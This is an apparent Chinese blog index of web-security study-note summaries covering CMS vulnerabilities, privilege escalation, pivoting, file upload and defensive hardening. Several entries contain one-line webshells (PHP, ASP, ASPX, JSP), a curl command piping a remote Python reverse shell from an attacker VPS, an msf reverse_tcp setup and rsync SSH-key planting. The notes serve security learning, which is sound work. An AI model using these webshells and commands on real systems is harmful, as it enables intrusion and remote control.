web安全学习笔记
снυαιαм ιее
这个作者很懒,什么都没留下…
展开
-
【学习笔记】74cms v3.6 任意密码重置漏洞
找回密码页面抓包改电话原创 2020-11-02 01:16:15 · 810 阅读 · 0 评论 -
【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
readfile函数(xx) 控制xx里面的内容就可以实现任意读取原创 2020-11-02 01:02:46 · 865 阅读 · 0 评论 -
【学习笔记】PHPCMS v9.6.0 wap模块 SQL注入
原创 2020-11-02 00:51:19 · 253 阅读 · 0 评论 -
【学习笔记】DedeCMS 5.7 /install/index.php 远程文件包含漏洞
变量覆盖:用我们自己自定义的参数替换程序原有的变量值一般需要结合程序其他功能来形成完整的攻击原本带有变量覆盖功能的函数extract 和prase_str或者是全局变量导致的覆盖$$key = $abc$key = '123'$123 = $abc如果我们可以控制$key 就可以实现变量的覆盖想想是否可以让require _once变成空 这样就可以成功覆盖了...原创 2020-11-02 00:12:48 · 678 阅读 · 0 评论 -
【学习笔记】PHPCMS v9.6.0 任意文件上传漏洞
漏洞触发点在注册功能我们的提交攻击载荷在$_POST['info'] 可以注意到它被htmlspeicalchar处理主要将尖括号转换为html实体看到变量名$func ='editor'-看到$value = xxx -> download(content )什么是锚点:是网页制作中超级链接的一种,又叫命名锚记。命名锚记像一个迅速定位器一样是一种页面内的超级链接,运用相当普遍相当于id= 或者 href="#top"playload = x原创 2020-11-01 22:28:47 · 331 阅读 · 0 评论 -
【学习笔记】ElasticSearch Groovy 脚本远程代码执行漏洞(CVE-2015-1427)
ES旧版本中使用MVEL作为脚本执行引擎 没有安全限制 因此可以构造任意java代码CVE -2014 -3120出了这个CVE后 又用groovy引擎了防止恶意脚本执行 还用了沙盒的机制(因为沙盒限制不严格导致漏洞)CVE-2015-1427沙盒通过黑白名单检测可以说它是浅沙盒如果黑名单禁用a() 白名单有b() 就用b()调用a()通过一个类获取另一个类通过getclass方法获取class对象反射调用类 替代品forname 利用它来调用java.lang.runtim原创 2020-11-01 14:02:43 · 396 阅读 · 0 评论 -
【学习笔记】Hadoop YARN REST API未授权访问
一般来说 api未授权访问一般导致信息泄露,但是如果包含管理和任务执行功能 就会扩大危害程度它的restapi开放在xx端口善用官方文档 看调用使用说明查看具体调用的位置curl -v -X post '网站详细地址'可以得到application id从官方文档查看调用的具体参数编辑一个data.jsoncurl -s -i -X POST -H 'accept:application/json' -H 'content-type:application/json' api原创 2020-11-01 13:39:08 · 899 阅读 · 0 评论 -
【学习笔记】WordPress <4.5 SSRF
SSRF服务端请求伪造php中常见的涉及对远程资源访问的函数fsockopen()file_get_content() curl_exec()主要是通过request的方法wordpress对请求的url有过滤:wp-includes/ http.php wp_http_vaildate_url进行url判断js中的trim是删除特定符号的意思preg_match执行正则表达式匹配curl接受八进制 因此可以绕过ip地址段的正则表达式有可能请求没有回显 但是可以通过nc来..原创 2020-11-01 13:05:19 · 277 阅读 · 0 评论 -
【学习笔记】Discuz 7.2 反射型xss漏洞
xss黑盒测试 测试在referer=处插入数据 然后看源码 看看js等信息如看到windows.location.href=‘’ 就要想到闭合引号 并且增加新增代码记得用;隔开settimeout其实用的是js的eval白盒代码审计find . -name '*.php' | xargs grep '你要找的函数'主要判断函数上面成立条件的if语句str_replace 对函数进行html进行编码操作...原创 2020-11-01 12:28:47 · 235 阅读 · 0 评论 -
【学习笔记】WordPress 4.2.0-4.5.1 flashmediaelement.swf 反射型 XSS
实例 wordpress 4.5.1如果是一般的flash xss 要做反编译swf 然后源码分析如果是开源项目的 直接github就能找到如何给flash文件传参html中的embed标签中的flashvar变量可以直接通过/.swf?a=xx&b=xx直接传参swf的核心代码是.as文件注意到里面有个关键函数externalinterface.call() 这个call其实就是调用js的函数(help.adobe.com看具体函数调用)注意objectid等参数.原创 2020-11-01 02:01:21 · 167 阅读 · 0 评论 -
【学习笔记】Python介绍与入门
建议直接学习python3 python3不向下兼容python2vi 1.pypython3 1.pychmod +x 1.py 给予执行权限4个空格表示一个级别的缩进 8个空格是第二个级别函数定义与函数定义之间需要两行定义:def sb():赋值 sb = '123' 或者是字典类型 sb = {’a‘:1} 或者元组类型 sb = (1,2)如果我们是直接执行某个.py文件的时候,该文件中那么”__name__ == '__main__'“是True,但是我们如..原创 2020-10-31 20:50:25 · 64 阅读 · 0 评论 -
【学习笔记】应用安全:云WAF
云waf及其原理waf类型:硬件防火墙(HTTP流量的监测,但是离线部署 意味着非实时更新)网络防火墙 例如安全狗云waf(有cdn功能 通过dns 移交域名解析来实现安全防护 发送至云端节点进行检测 但是如果知道了真实ip就可以直接绕过)...原创 2020-10-31 03:23:18 · 282 阅读 · 2 评论 -
【学习笔记】主机安全:入侵检测
入侵检测的设备:IDS特点:硬件的形式 通过网络的方式为主 通过旁路流量来分析异常的网络行为来判断入侵相关产品:snort今天的内容:基于主机的入侵检测 OSSEC如何判断被入侵:1)异常的文件落地 主要是二进制的webshell 2)异常登录行为 3)异常的网络请求(DNS HTTP 反弹shell) 4)...原创 2020-10-31 03:04:52 · 639 阅读 · 1 评论 -
【学习笔记】主机安全,服务器加固
1)关闭非必要服务,减少攻击面2)修复安全问题,解决隐患3)优化策略,增加限制,提高入侵难度4)优化日志储存,提供可溯源windows计算机管理-》查看用户中的guest是否被禁用本地安全策略-》账户策略-》密码策略-》密码复杂度,最小值,使用周期,强制密码历史(与前几次密码不能相同) -》本地策略-》安全选项-》启用交互式登录(不显示最后登录用户名)改默认管理员用户名和默认端口注册表regedit打开HKEY_LOCAL_M...原创 2020-10-30 22:57:18 · 285 阅读 · 0 评论 -
【学习笔记】业务安全:内容安全
色情词汇鉴别:源码提取title和关键词 对title和关键词进行分词 采用贝叶斯算法计算是色情信息的概率建议:使用云厂商提供的内容安全产品,通过api将需要判断的内容上报,云厂商返回结果视频的文字图片识别:OCR光学字符识别...原创 2020-10-30 22:00:51 · 146 阅读 · 0 评论 -
【学习笔记】常见的提权方式
提权:linux 内核提权 配置错误提权(用dirtycow提权) windows 系统漏洞提权msf前提:已经通过nc -lvv 监听find /usr/bin -perm -us=s usid权限文件查询ls -la /usr/bin/passwd看到-rwsr-xr-x 1 说明存在suid位如何提权?用vim.basic提权(可以编辑root才能运行的文件)然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式sh...原创 2020-10-29 03:51:28 · 1186 阅读 · 0 评论 -
【学习笔记】利用web漏洞来getshell
nmap命令扫码nmap ip -p端口 -sP -sV --version-allrsync未授权访问(端口873)rsync (--port=端口) ip:: //看看有什么文件rsync (--port=端口) ip::file //进入文件rsync (--port=端口) ip::file/.exe /下载本地目录 下载到本地rsync (--port=端口) 本地文件地址 ip::file //上传文件,这时上传ssh公钥ssh root@ip 进行链接rm 文件地址 //删..原创 2020-10-29 02:32:32 · 394 阅读 · 0 评论 -
【学习笔记】进入内网的几种方法
当可以通过ssh连接A 目标访问Bssh ip -lrr //空密码连接ssh ip -D端口 -CNfg(流量压缩) //端口转发 >>export all_proxy=http://127.0.0.1:端口当不可以通过ssh下载反弹shell 的py脚本通过py启动http (python -m SimpleHTTPServer)curl A的ip/shell.php --data "c=system("curl 我的vps的ip/xx.py|python");"nc -l.原创 2020-10-29 02:30:39 · 3361 阅读 · 0 评论 -
【学习笔记】渗透信息搜集
CDN:内容分发网络,利用缓存服务器,提升访问速度。绕过:发邮件,shodan,SSRFshodan详解:语法:http.favicon.hash来查询 具体:将icon文件进行base64解码,然后通过python的mmh3库进行运算 语法:port:"6379" -noauth (6379是redis的端口)github code search:域名 stmp password...原创 2020-10-29 02:28:46 · 112 阅读 · 0 评论 -
【学习笔记】一句话木马结合curl
利用sqlmap注入出md5发现在cmd5上无法查出结果,我们只能尝试修改密码sqlmap --sql-shell 当pdo和mysqli时输入update 表 set 字段=md5注入被ban,利用参数–safe-freq和–random-agent上传一句话木马<?php eval($_POST[e]);?>curl 域名 -X post --data "e=system('ls')"...原创 2020-10-29 02:25:38 · 656 阅读 · 0 评论 -
【学习笔记】msf的使用
目标主机:2003rs2漏洞:cve-2017-7269 ms17-010exp搜索 : search cve-xxx利用:use exp名称看配置:show options配置:set 配置名 一个值设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell)最终攻击:exploit把shell放后台:background交互:session -l 然后 session -i 1添加路由攻击内网:run autoroute原创 2020-10-29 02:23:09 · 275 阅读 · 0 评论 -
【学习笔记】代码审计实战之SQL注入漏洞
大多数php框架都会对sql操作有封装,例如findone() get()where()这样的函数,用来接收字符串或者数字。框架对数组的值进行过滤或者参数绑定,防止sql注入在sql中用两个反引号包裹数据表的字段名危险函数findall() findone() where()判断特征:拼接sql语句的where条件阶段,对于字段名不过滤或者过滤不当的框架程序怎么判断自己找到的入口页面对不对?html加入die('...')即可例子:findone($str)里面的变量可控 找到这个变原创 2020-08-28 03:13:58 · 222 阅读 · 0 评论 -
【学习笔记】php代码审计入门
php常见套路:php和html混写 MVC模式(模型视图控制器结构)调式php工具:xdebug(下断点) phpmyadmin设置general log 然后再控制台监听日志文件(看看执行了哪些sql语句) 网络相关调试 用wireshark抓包注意:还可以利用软件破解和杀毒软件的思路,用系统工具检测代码运行过程中生成和修改了哪些文件代码审计本质: ...原创 2020-08-27 22:22:17 · 521 阅读 · 0 评论 -
【学习笔记】逻辑漏洞
主要有:程序员安全开发意识不足(扫描器难以发现):特殊假设做出明显或者隐晦的错误。逻辑漏洞常见表现形式:1.越权水平越权(同级别),垂直越权(不同级别)content-type=json水平越权测试:在请求的数据包中将唯一标识符如id修改数据查看返回结果。垂直越权测试:以游客身份发送数据包,添加代表用户权限的字段。2.无限制重试后端对参数发送没有限制导致,如密码爆破和短信轰炸功能3.后端信任前端数据出现在步骤多的功能上:如商品购买支付环节,修改参数 ...原创 2020-08-27 03:55:50 · 169 阅读 · 0 评论 -
【学习笔记】APT攻击阶段
阶段模型:信息搜集,攻击阶段,提权阶段,后渗透阶段(安个后门,权限维持),销声匿迹擅长利用框架漏洞攻击,如Jenkins、Weblogic、Struts2、RMI、Jboss、Tomcat、Spring、ActiveMQ、Zabbix等;APT具备的能力:常规攻击和已知漏洞发现,0day发现,深度威胁分析能力,对流量进行深度检测...原创 2020-08-27 03:06:33 · 556 阅读 · 0 评论 -
【学习笔记】命令和代码执行漏洞
不同之处:命令执行是执行操作系统命令,而代码执行是执行代码语句,代码语句可以具有命令执行能力。危险注意:php中的system和exec两个函数可以代用外部命令。代码执行函数:assert和eval代码执以外的其他状况导致命令执行:破壳漏洞和imagemagick漏洞提权:注意:web的方式执行命令采用非管理员用户,如WWW-DATA...原创 2020-08-27 03:26:48 · 131 阅读 · 0 评论 -
【学习笔记】文件上传限制绕过
MIME类型修改绕过上传MIME:设置拓展名的文件用另一种应用程序打开。方法:用burpsuite捕获HTTP请求,修改CONTENT-TYPE的内容文件内容绕过方法:cmd下命令:copy /b 1.jpg+webshell.php 2.jpgjavascript前端绕过注意javascript的checkfile()函数方法:F12自带游览器开发工具-DOM资源管理器 把函数onsubmit="return checkfile()"整个删除 就可以上传了...原创 2020-08-24 16:06:09 · 166 阅读 · 0 评论 -
【学习笔记】文件上传漏洞
asp一句话木马<%If Request("1") "" Then ExecuteGlobal(Request("1"))%>php一句话木马<?php eval($_POST[1]);?>aspx一句话木马<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>jsp一句话木马<%Runtime.getRuntime().exec(req原创 2020-08-24 15:49:03 · 182 阅读 · 0 评论 -
【学习笔记】AI与安全
国内:wislab.cn、freebug.com、anquanke.com、aqniu.com、secbox.cn、secfree.com、secpluse.com、hackernews.cc、sec-wiki.com、91ri.org、paper.seebug.org国外:thehackernews.com、ehackingnews.com、hackread.com、securityweek.com漏洞平台:seebug.org、exploit-db.com、seclists.org、原创 2020-08-23 02:13:40 · 226 阅读 · 0 评论 -
【学习笔记】解读HTTP消息头
下面以burpsuite抓包为例:RAWGET(提交方式) /路径 HTTP/1.1(协议版本)HOST:网址:端口USER-AGENT:游览器的版本,类型,包含本地的操作系统信息ACCEPT:游览器告诉服务器自己可以处理的内容类型ACCEPT-LANGUAGE:游览器结合系统环境,告诉服务器希望返回的语言内容ACCEPT-ENCODING:游览器告诉服务器自己支持用什么算法压缩过的内容REFERER:当前页面的来源网址CONNECTION:连接状态COOKIES:保原创 2020-08-23 02:05:52 · 76 阅读 · 0 评论 -
【学习笔记】跨源访问和同源策略解读
同源策略含义:没有被授权,不能读写对方资源同源:要协议相同,域名相同(包含www.属于二级域名),端口相同常见允许跨源访问的例子:JSONP:跨源的对方给你一段JS执行,而SCRIPT中的SRC属性是允许跨源的,所以达到了目的。CORS:修改HTTP响应,例给ACCESS-CONTROL-ALLOW-ORGIN添加相关信息。游览器放行,请求方拿到数据。WEBSOCKS:通信协议,使用WS://(非加密)WSS://(加密)作为前缀,该协议不支持同源协议,可跨源通信。...原创 2020-08-23 02:02:24 · 401 阅读 · 0 评论 -
【学习笔记】HTML DOM树解读
DOM全称:文档对象模型HTML DOM定义了访问HTML的标准,DOM将HTML文档表达为树结构,很多攻击是针对DOM展开的游览器渲染机制解析顺序:HTML>CSS>JS解码顺序:HTML>URL>JSDOM型XSS:通过JS修改HTML导致XSS产生。...原创 2020-08-23 01:57:47 · 160 阅读 · 0 评论 -
【学习笔记】COOKIES和SESSION解读
COOKIES:存放在客户端,可以由服务器发送指令或客户端通过JS脚本让游览器生成服务器在消息头告诉游览器设置cookies解读:SET-COOKIES:PHPSESSID=;PATH:/存放路径 ;domain=网址;SECURE(只在HTTPS下传输);HTTPONLY(禁止被JS获取)SET-COOKIES:EXPIRES(cookies有效期,到期游览器被删除)SESSION:存放在服务器cookie不是很安全,别人可以分析存放在本地的COOKIE并进行COOKIE欺骗考...原创 2020-08-23 01:54:08 · 96 阅读 · 0 评论 -
【学习笔记】内容安全策略(CSP)和游览器安全策略解读
CSP:检测和缓解某些类型的攻击,限制加载某些数据,可以添加在HTTP响应头或者在HTML里添加META标签实现,如果两者都设置,以HEADER头设置的为准待续原创 2020-08-23 01:51:45 · 101 阅读 · 0 评论 -
【学习笔记】服务器入侵溯源
操作系统:ubuntu1)输入命令top查看占用内存的可疑进程及其进程字串符2)输入命令netstat -anpt查看tcp连接中的可疑地址 然后放到ipip.net和x.threatbook.cn查看详情3)输入命令ls -lh /proc/进程字串符查看进程的木马存放目录及其名称4)输入命令kill -9 进程字串符 杀掉木马进程5)进入到木马目录 输入命令md5sum 木马名称提取md5放到virustotal.com查看木马详情6)输入命令history |grep...原创 2020-08-23 01:36:22 · 670 阅读 · 0 评论 -
【学习笔记】xss攻击解读
反射型XSS:经过后端,不经过数据库储存型XSS:经过后端,经过数据库DOM XSS:不经过后端和数据库,基本可以归类为反射型XSS挖掘方式:1)直接提交输入框2)关注HEADER部分3)URL提交4)输入框闭合引发XSS...原创 2020-08-23 01:46:13 · 157 阅读 · 0 评论 -
【学习笔记】HTML5安全基础
HTML5安全学习网站:http://html5sec.org涉及的安全问题:1)CROS 因为ACCESS-CONTROL-ALLOW-ORGIN=*引发的安全问题利用:工具SHELL OF FUTURE 进行会话劫持2)利用新标签来逃避WAF,黑名单3)利用history.pushstate属性来隐藏url中payload实现钓鱼4)利用xss攻击web storage获取敏感信息5)对WEBSQ本地数据库查询实行注入...原创 2020-08-23 01:44:18 · 124 阅读 · 0 评论 -
【学习笔记】SQL注入基础以及命令
登录检验顺序方式1)一同检验账号密码2)先检验账号 再检验密码常用SQL查询语句select 字段 from 表单 where 字段范围SQL注入点类型:varchar字符型:需要引号包含int整数型如何发现注入点:GET POST HTTP头COOKIES 只要是和数据库交互的都可能存在注入union联合注入:多个select语句合并条件:前后select字段数目一样如何判断select字段数目,使用order by查询语句进行排序,一旦超过字段数目则会报错原创 2020-08-23 01:41:08 · 138 阅读 · 0 评论